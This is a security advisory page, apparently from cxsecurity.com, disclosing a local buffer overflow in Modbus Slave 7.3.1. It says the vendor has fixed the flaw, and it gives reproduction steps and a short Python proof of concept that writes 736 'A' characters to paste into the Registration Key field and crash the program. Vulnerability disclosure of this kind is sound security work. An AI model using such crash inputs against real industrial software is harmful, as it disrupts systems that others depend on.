Modbus Slave 7.3.1 Buffer Overflow

2021.11.22
Credit: Yehia Elghaly
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

Vendor has been notified and fixed https://www.modbustools.com/ModSlaveChangeLog.txt tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Steps to reproduce: # 1. - Download and install Modbus Slave # 2. - Run the python script and it will create modbus.txt file. # 3. - Modbus Slave 7.3.1 < 7.4.2 # 4. - Connection -> Connect # 5. - Paste the characters of txt file to Registration Key # 6. - press "ok" button # 7. - Crashed #!/usr/bin/python exploit = 'A' * 736 try: file = open("Modbus.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top